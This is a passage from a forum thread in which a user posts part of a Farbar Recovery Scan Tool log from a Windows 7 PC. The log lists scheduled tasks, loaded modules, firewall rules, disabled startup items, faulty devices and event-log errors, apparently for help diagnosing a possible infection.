    Task: {6563C209-7317-40AB-B1C0-72BF3B519D30} - System32\Tasks\{F21BBE26-5173-4D1B-A4D7-289191AC4336} => pcalua.exe -a "E:\SW\PTC Creo 2.0 F000 Win32 + Win64 Multilanguage with crack + HelpCenter\PTC_Creo_2.0_F000_Multilanguage\setup.exe" -d "E:\SW\PTC Creo 2.0 F000 Win32 + Win64 Multilanguage with crack + HelpCenter\PTC_Creo_2.0_F000_Multilanguage"
    Task: {6D8762C9-BBB2-40BD-AD90-5DB14306F38E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-05] (Google Inc.)
    Task: {D1348DE2-EE47-4671-8CE6-AB2CF613F69B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-05] (Google Inc.)
    Task: {DABBA7EF-6EB1-4BC5-A420-E50B3170F6A6} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2015-09-05] ()
    Task: {DB79B6E5-01FF-496F-8549-4B900B3720A1} - System32\Tasks\{A0F80D69-4945-4230-AF59-AE70922D543C} => C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\JobLauncher.exe [2014-05-02] (Panda Security, S.L.)
    Task: {E52FEEBB-8FF3-492B-8B43-951ECCED89CF} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-07-18] (Piriform Ltd)
    Task: {E7676096-C1A0-4F22-8EB0-E9D31F1E69F7} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-10-16] (Adobe Systems Incorporated)

    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

    Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
    Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    Task: C:\Windows\Tasks\{A0F80D69-4945-4230-AF59-AE70922D543C}.job => C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\JobLauncher.exe
     
  5. blackclaw96

    blackclaw96 TS Rookie Topic Starter

    ==================== Shortcuts =============================

    (The entries could be listed to be restored or removed.)

    ==================== Loaded Modules (Whitelisted) ==============

    2014-11-18 08:29 - 2014-11-18 08:29 - 00047464 _____ () C:\Program Files (x86)\Wi-Fi\WiFiGxSvc.exe
    2015-09-07 19:24 - 2012-08-08 21:36 - 00390672 _____ () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
    2010-01-30 02:40 - 2010-01-30 02:40 - 04254560 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
    2010-03-24 21:38 - 2010-03-24 21:38 - 08794976 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
    2015-09-05 21:06 - 2011-10-26 17:41 - 00318976 _____ () C:\Program Files\TeraCopy\TeraCopyExt64.dll
    2014-06-01 15:48 - 2014-06-01 15:48 - 01396736 _____ () C:\Program Files (x86)\Codebox\BitMeter\BitMeter2.exe
    2016-01-31 20:59 - 2013-12-22 11:52 - 00047496 _____ () C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\QtSolutions_Service-head.dll
    2016-01-31 20:59 - 2013-12-22 11:52 - 00104328 _____ () C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\qjson0.dll
    2013-04-21 21:44 - 2013-04-21 21:44 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
    2013-04-21 21:44 - 2013-04-21 21:44 - 01242952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
    2013-04-12 22:53 - 2013-04-12 22:53 - 00612664 _____ () C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\SQLite3.dll
    2010-01-30 02:41 - 2010-01-30 02:41 - 04254560 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
    2010-03-24 21:17 - 2010-03-24 21:17 - 08794464 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
    2015-09-05 19:01 - 2013-09-16 12:17 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
    2014-12-01 14:17 - 2014-12-01 14:17 - 00044560 _____ () C:\Program Files (x86)\Wi-Fi\plugins\txn.controller_0.1.0.dll
    2014-11-20 12:07 - 2014-11-20 12:07 - 00367632 _____ () C:\Program Files (x86)\Wi-Fi\CTKPluginFramework.dll
    2014-11-20 12:07 - 2014-11-20 12:07 - 00144400 _____ () C:\Program Files (x86)\Wi-Fi\libqjson.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00417280 _____ () C:\Program Files (x86)\Winamp\nsutil.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00078848 _____ () C:\Program Files (x86)\Winamp\nde.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00023040 _____ () C:\Program Files (x86)\Winamp\System\albumart.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00019456 _____ () C:\Program Files (x86)\Winamp\System\bmp.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00047616 _____ () C:\Program Files (x86)\Winamp\zlib.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00016896 _____ () C:\Program Files (x86)\Winamp\System\dlmgr.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00014336 _____ () C:\Program Files (x86)\Winamp\System\filereader.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00019456 _____ () C:\Program Files (x86)\Winamp\System\gif.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00016384 _____ () C:\Program Files (x86)\Winamp\System\gracenote.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00623616 _____ () C:\Program Files (x86)\Winamp\System\jnetlib.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00154624 _____ () C:\Program Files (x86)\Winamp\System\jpeg.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00084480 _____ () C:\Program Files (x86)\Winamp\System\playlist.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00103936 _____ () C:\Program Files (x86)\Winamp\System\png.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00013824 _____ () C:\Program Files (x86)\Winamp\System\primo.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00021504 _____ () C:\Program Files (x86)\Winamp\System\tagz.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00035328 _____ () C:\Program Files (x86)\Winamp\System\timer.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00090112 _____ () C:\Program Files (x86)\Winamp\System\xml.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00068608 _____ () C:\Program Files (x86)\Winamp\Plugins\in_avi.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00102400 _____ () C:\Program Files (x86)\Winamp\Plugins\in_cdda.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00072192 _____ () C:\Program Files (x86)\Winamp\Plugins\in_dshow.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00061440 _____ () C:\Program Files (x86)\Winamp\Plugins\in_flac.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00043008 _____ () C:\Program Files (x86)\Winamp\Plugins\in_flv.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00007168 _____ () C:\Program Files (x86)\Winamp\Plugins\in_linein.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00109568 _____ () C:\Program Files (x86)\Winamp\Plugins\in_midi.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00049152 _____ () C:\Program Files (x86)\Winamp\Plugins\in_mkv.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00165376 _____ () C:\Program Files (x86)\Winamp\Plugins\in_mod.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00290304 _____ () C:\Program Files (x86)\Winamp\Plugins\in_mp3.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00052736 _____ () C:\Program Files (x86)\Winamp\Plugins\in_mp4.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00075264 _____ () C:\Program Files (x86)\Winamp\Plugins\in_nsv.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00023552 _____ () C:\Program Files (x86)\Winamp\Plugins\in_swf.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00253440 _____ () C:\Program Files (x86)\Winamp\Plugins\in_vorbis.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00016896 _____ () C:\Program Files (x86)\Winamp\Plugins\in_wave.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00253440 _____ () C:\Program Files (x86)\Winamp\libsndfile.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00313344 _____ () C:\Program Files (x86)\Winamp\Plugins\in_wm.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00022528 _____ () C:\Program Files (x86)\Winamp\Plugins\out_disk.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00052224 _____ () C:\Program Files (x86)\Winamp\Plugins\out_ds.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00018432 _____ () C:\Program Files (x86)\Winamp\Plugins\out_wave.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 01737728 _____ () C:\Program Files (x86)\Winamp\Plugins\gen_ff.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00083968 _____ () C:\Program Files (x86)\Winamp\tataki.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00340992 _____ () C:\Program Files (x86)\Winamp\Plugins\freeform\wacs\freetype\freetype.wac
    2011-12-09 22:53 - 2015-09-07 18:43 - 00027648 _____ () C:\Program Files (x86)\Winamp\Plugins\gen_hotkeys.dll
    2011-11-11 03:40 - 2015-09-07 18:43 - 00185344 _____ () C:\Program Files (x86)\Winamp\Plugins\gen_jumpex.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00025600 _____ () C:\Program Files (x86)\Winamp\Plugins\gen_tray.dll
    2015-09-22 11:31 - 2016-02-14 00:12 - 08772096 _____ () C:\Program Files (x86)\AirDroid\Android.dll
    2014-03-19 18:48 - 2016-02-14 00:12 - 00630784 _____ () C:\Program Files (x86)\AirDroid\System.Data.SQLite.dll
    2016-02-20 16:37 - 2016-02-18 09:44 - 01630360 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libglesv2.dll
    2016-02-20 16:37 - 2016-02-18 09:44 - 00085656 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libegl.dll
    2016-03-10 11:17 - 2016-03-08 12:16 - 17541312 _____ () C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\PepperFlash\21.0.0.182\pepflashplayer.dll

    ==================== Alternate Data Streams (Whitelisted) =========

    (If an entry is included in the fixlist, only the ADS will be removed.)


    ==================== Safe Mode (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\NanoServiceMain => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PSUAService => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NanoServiceMain => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PSUAService => ""="Service"

    ==================== EXE Association (Whitelisted) ===============

    (If an entry is included in the fixlist, the registry item will be restored to default or removed.)


    ==================== Internet Explorer trusted/restricted ===============

    (If an entry is included in the fixlist, it will be removed from the registry.)


    ==================== Hosts content: ===============================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2009-07-14 08:04 - 2009-06-11 02:30 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts


    ==================== Other Areas ============================

    (Currently there is no automatic fix for this section.)

    HKU\S-1-5-21-3006523739-2206101463-1198655294-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\WELCOME\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
    DNS Servers: 113.193.12.14 - 113.193.1.14
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
    Windows Firewall is enabled.

    ==================== MSCONFIG/TASK MANAGER disabled items ==

    (Currently there is no automatic fix for this section.)

    MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^CheVolume.lnk => C:\Windows\pss\CheVolume.lnk.CommonStartup
    MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^TP-LINK Wireless Configuration Utility.lnk => C:\Windows\pss\TP-LINK Wireless Configuration Utility.lnk.CommonStartup
    MSCONFIG\startupfolder: C:^Users^WELCOME^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Rainmeter.lnk => C:\Windows\pss\Rainmeter.lnk.Startup
    MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
    MSCONFIG\startupreg: AdobeBridge =>
    MSCONFIG\startupreg: ADSKAppManager => "C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgr.exe" -showminimized -checkautorun
    MSCONFIG\startupreg: AirDroid 3 => C:\Program Files (x86)\AirDroid\AirDroid.exe /start
    MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
    MSCONFIG\startupreg: BCSSync => "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
    MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
    MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
    MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
    MSCONFIG\startupreg: Greenshot => C:\Program Files\Greenshot\Greenshot.exe
    MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
    MSCONFIG\startupreg: Pushbullet => "C:\Program Files (x86)\Pushbullet\pushbullet.exe" -show false
    MSCONFIG\startupreg: Sidebar => C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
    MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
    MSCONFIG\startupreg: uTorrent => "C:\Users\WELCOME\AppData\Roaming\uTorrent\uTorrent.exe" /MINIMIZED
    MSCONFIG\startupreg: WiFiShare => "C:\Program Files (x86)\Wi-Fi\Wi-Fi.exe"
    MSCONFIG\startupreg: WinampAgent => "C:\Program Files (x86)\Winamp\winampa.exe"

    ==================== FirewallRules (Whitelisted) ===============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    FirewallRules: [TCP Query User{D0ED51D2-6203-4753-B1B9-804E7728AB41}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
    FirewallRules: [UDP Query User{91259D9C-DDDE-4957-B69F-4311F23331CB}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
    FirewallRules: [{F25F1646-8C9B-4FE0-9B5A-A155A246BFCC}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
    FirewallRules: [{B189C102-FD99-4524-A7EE-40699DEBB32A}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
    FirewallRules: [{52D0BF70-F02D-4B4F-955B-937BD9BF68BF}] => (Allow) C:\Program Files (x86)\Nero\Nero Blu-ray Player\Blu-rayPlayer.exe
    FirewallRules: [{4F408890-3EC8-450E-B2BC-8846F74D4022}] => (Allow) C:\Program Files (x86)\Nero\Nero Blu-ray Player\Blu-rayPlayer.exe
    FirewallRules: [{7933003A-8BC9-42BA-A4CE-97266B91A16A}] => (Allow) C:\Program Files (x86)\Nero\KM\NMDllHost.exe
    FirewallRules: [{818D1D8E-8701-4629-9C58-C24CD40CD227}] => (Allow) C:\Program Files (x86)\Nero\KM\NMDllHost.exe
    FirewallRules: [{B1E52EA3-9087-4BBE-AB78-337E4E1BE37A}] => (Allow) E:\Halo 2\halo2.exe
    FirewallRules: [{DB42344B-E29D-471A-816A-0DB775551DB0}] => (Allow) E:\Halo 2\halo2.exe
    FirewallRules: [{88F1F453-5494-43E7-ACAD-2CCC728392A2}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
    FirewallRules: [{AB522F61-AA75-44B1-91D5-A0E38C6F50A3}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{19AE1153-5A02-4219-BB03-C9B2C7D96BA8}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{448FBDFF-0F27-40C0-8A62-0EF61697A285}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{B28A5054-13DF-4435-9EC7-27D9E9CAF2E6}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{1191A94A-52A8-4A9D-99F0-8D5D7134F2E4}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe
    FirewallRules: [TCP Query User{9D757DCF-7426-43E7-B947-9F2D9A8CDABC}C:\program files (x86)\airdroid\airdroid.exe] => (Allow) C:\program files (x86)\airdroid\airdroid.exe
    FirewallRules: [UDP Query User{4AEC743F-9635-458A-ABBC-59AAF703FB1A}C:\program files (x86)\airdroid\airdroid.exe] => (Allow) C:\program files (x86)\airdroid\airdroid.exe
    FirewallRules: [{025B1FA6-BEFB-4EA5-B33C-D865EA3B6CE4}] => (Allow) C:\Program Files (x86)\pandasecuritytb\dtUser.exe
    FirewallRules: [{BE9D44D5-C882-456E-93EB-E21083969B3C}] => (Allow) C:\Program Files (x86)\pandasecuritytb\dtUser.exe
    FirewallRules: [{83E823B3-DE03-4406-9AC0-87FB88D1FE0D}] => (Allow) C:\Users\WELCOME\AppData\Roaming\uTorrent\uTorrent.exe
    FirewallRules: [{B418AD8E-2F6C-4EB0-AB54-C865729BDCF4}] => (Allow) C:\Users\WELCOME\AppData\Roaming\uTorrent\uTorrent.exe
    FirewallRules: [{0F5B56A6-2AE4-4410-8A0B-5D4C8D0D4215}] => (Allow) C:\Users\WELCOME\AppData\Roaming\uTorrent\uTorrent.exe
    FirewallRules: [{93A591AC-0873-45D0-8E83-53FB076D3574}] => (Allow) C:\Users\WELCOME\AppData\Roaming\uTorrent\uTorrent.exe
    FirewallRules: [{513B16FD-157A-4F63-A326-28F9DF27863C}] => (Allow) C:\Users\WELCOME\AppData\Roaming\uTorrent\uTorrent.exe
    FirewallRules: [{C02E2E0A-779E-4B80-8A19-7E0D3E74CE5F}] => (Allow) C:\Users\WELCOME\AppData\Roaming\uTorrent\uTorrent.exe
    FirewallRules: [{81E63C48-EF1C-4197-A792-CC6F910D9542}] => (Allow) C:\Program Files (x86)\Wi-Fi\Wi-Fi.exe
    FirewallRules: [{5FC51A79-1BA4-4A6E-8A81-C556C429A9A5}] => (Allow) C:\Program Files (x86)\Wi-Fi\TX_Httpd.exe
    FirewallRules: [TCP Query User{E38A9C8D-9F74-45C3-9C9F-941B852A88AD}C:\program files (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\vlc.exe
    FirewallRules: [UDP Query User{4EDDC5E3-15AB-44B8-AC0E-1A6FF0DBC50B}C:\program files (x86)\videolan\vlc\vlc.exe] => (Allow) C:\program files (x86)\videolan\vlc\vlc.exe
    FirewallRules: [TCP Query User{490F4279-75D5-42CC-8361-E86C0EDB2C69}C:\program files (x86)\airdroid\airdroid.exe] => (Allow) C:\program files (x86)\airdroid\airdroid.exe
    FirewallRules: [UDP Query User{BFDAD4B8-5A2D-43CD-9E47-7DA8944467C0}C:\program files (x86)\airdroid\airdroid.exe] => (Allow) C:\program files (x86)\airdroid\airdroid.exe
    FirewallRules: [{766A022E-9683-40F8-BB4D-9B5A4FEE95A5}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    FirewallRules: [TCP Query User{80F18ED6-5C9C-4E45-B3A7-30401FFF5435}E:\need for speed most wanted 2013\nfs13.exe] => (Block) E:\need for speed most wanted 2013\nfs13.exe
    FirewallRules: [UDP Query User{BF968C13-089A-41FD-BC9D-D0B6B271ADF6}E:\need for speed most wanted 2013\nfs13.exe] => (Block) E:\need for speed most wanted 2013\nfs13.exe
    FirewallRules: [TCP Query User{FCE17CFC-5778-4E86-9988-AB6D2FD931AF}C:\program files (x86)\soundwire server\soundwireserver.exe] => (Allow) C:\program files (x86)\soundwire server\soundwireserver.exe
    FirewallRules: [UDP Query User{B40B9540-1081-4B84-B720-92282C3FE1B5}C:\program files (x86)\soundwire server\soundwireserver.exe] => (Allow) C:\program files (x86)\soundwire server\soundwireserver.exe

    ==================== Restore Points =========================

    11-03-2016 15:46:35 Scheduled Checkpoint

    ==================== Faulty Device Manager Devices =============

    Name: Teredo Tunneling Pseudo-Interface
    Description: Microsoft-Teredo-Tunneling-Adapter
    Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
    Manufacturer: Microsoft
    Service: tunnel
    Problem: : This device cannot start. (Code10)
    Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
    On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

    Name: Azzouzi HotSpot LightWeight Filter
    Description: Azzouzi HotSpot LightWeight Filter
    Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
    Manufacturer:
    Service: ndiskhaz
    Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
    Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
    Devices stay in this state if they have been prepared for removal.
    After you remove the device, this error disappears.Remove the device, and this error should be resolved.


    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (03/11/2016 10:45:09 PM) (Source: BstHdAndroidSvc) (EventID: 0) (User: )
    Description: Service cannot be started. System.ApplicationException: Cannot start service. Service did not stop gracefully the last time it was run.
    at BlueStacks.hyperDroid.Service.Service.OnStart(String[] args)
    at System.ServiceProcess.ServiceBase.ServiceQueuedMainCallback(Object state)

    Error: (03/11/2016 10:45:09 PM) (Source: WinMgmt) (EventID: 10) (User: )
    Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

    Error: (03/11/2016 08:56:38 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Name der fehlerhaften Anwendung: VideoAcceleratorService.exe, Version: 3.3.8.0, Zeitstempel: 0x51c03e8a
    Name des fehlerhaften Moduls: ntdll.dll, Version: 6.1.7601.19110, Zeitstempel: 0x5684255b
    Ausnahmecode: 0xc0000005
    Fehleroffset: 0x0002e3c6
    ID des fehlerhaften Prozesses: 0xa6c
    Startzeit der fehlerhaften Anwendung: 0xVideoAcceleratorService.exe0
    Pfad der fehlerhaften Anwendung: VideoAcceleratorService.exe1
    Pfad des fehlerhaften Moduls: VideoAcceleratorService.exe2
    Berichtskennung: VideoAcceleratorService.exe3

    Error: (03/11/2016 08:18:44 PM) (Source: WinMgmt) (EventID: 10) (User: )
    Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

    Error: (03/11/2016 08:18:30 PM) (Source: BstHdAndroidSvc) (EventID: 0) (User: )
    Description: Service cannot be started. System.ApplicationException: Cannot start service. Service did not stop gracefully the last time it was run.
    at BlueStacks.hyperDroid.Service.Service.OnStart(String[] args)
    at System.ServiceProcess.ServiceBase.ServiceQueuedMainCallback(Object state)

    Error: (03/11/2016 05:43:13 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Name der fehlerhaften Anwendung: VideoAcceleratorService.exe, Version: 3.3.8.0, Zeitstempel: 0x51c03e8a
    Name des fehlerhaften Moduls: ntdll.dll, Version: 6.1.7601.19110, Zeitstempel: 0x5684255b
    Ausnahmecode: 0xc0000005
    Fehleroffset: 0x00032973
    ID des fehlerhaften Prozesses: 0xa50
    Startzeit der fehlerhaften Anwendung: 0xVideoAcceleratorService.exe0
    Pfad der fehlerhaften Anwendung: VideoAcceleratorService.exe1
    Pfad des fehlerhaften Moduls: VideoAcceleratorService.exe2
    Berichtskennung: VideoAcceleratorService.exe3

    Error: (03/11/2016 02:24:35 PM) (Source: Windows Search Service) (EventID: 7010) (User: )
    Description: Der Index kann nicht initialisiert werden.

    Details:
    The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

    Error: (03/11/2016 02:24:35 PM) (Source: Windows Search Service) (EventID: 3058) (User: )
    Description: Die Anwendung kann nicht initialisiert werden.

    Context: Windows Application

    Details:
    The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

    Error: (03/11/2016 02:24:35 PM) (Source: Windows Search Service) (EventID: 3028) (User: )
    Description: Das Gatherer-Objekt kann nicht initialisiert werden.

    Context: Windows Application, SystemIndex Catalog

    Details:
    The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)

    Error: (03/11/2016 02:24:35 PM) (Source: Windows Search Service) (EventID: 3029) (User: )
    Description: Plug-In in <Search.TripoliIndexer> kann nicht initialisiert werden.

    Context: Windows Application, SystemIndex Catalog

    Details:
    Element not found. (HRESULT : 0x80070490) (0x80070490)


    System errors:
    =============
    Error: (03/13/2016 12:29:51 PM) (Source: ipnathlp) (EventID: 1233) (User: )
    Description:

    Error: (03/13/2016 12:17:44 PM) (Source: ipnathlp) (EventID: 1233) (User: )
    Description:

    Error: (03/13/2016 11:49:35 AM) (Source: TermDD) (EventID: 50) (User: )
    Description: Die RDP-Protokollkomponente X.224 hat einen Fehler im Protokollablauf festgestellt und die Clientverbindung getrennt.

    Error: (03/13/2016 10:15:45 AM) (Source: TermDD) (EventID: 50) (User: )
    Description: Die RDP-Protokollkomponente X.224 hat einen Fehler im Protokollablauf festgestellt und die Clientverbindung getrennt.

    Error: (03/13/2016 07:17:47 AM) (Source: TermDD) (EventID: 50) (User: )
    Description: Die RDP-Protokollkomponente X.224 hat einen Fehler im Protokollablauf festgestellt und die Clientverbindung getrennt.

    Error: (03/13/2016 06:53:11 AM) (Source: ipnathlp) (EventID: 1233) (User: )
    Description:

    Error: (03/13/2016 06:41:04 AM) (Source: ipnathlp) (EventID: 1233) (User: )
    Description:

    Error: (03/13/2016 06:03:22 AM) (Source: ipnathlp) (EventID: 1233) (User: )
    Description:

    Error: (03/13/2016 05:51:15 AM) (Source: ipnathlp) (EventID: 1233) (User: )
    Description:

    Error: (03/13/2016 05:51:07 AM) (Source: TermDD) (EventID: 50) (User: )
    Description: Die RDP-Protokollkomponente X.224 hat einen Fehler im Protokollablauf festgestellt und die Clientverbindung getrennt.


    CodeIntegrity:
    ===================================
    Date: 2016-03-11 22:44:30.087
    Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\scdemu.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

    Date: 2016-03-11 22:44:30.056
    Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\scdemu.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

    Date: 2016-03-11 20:17:58.903
    Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\scdemu.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

    Date: 2016-03-11 20:17:58.872
    Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\scdemu.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

    Date: 2016-03-11 14:21:46.168
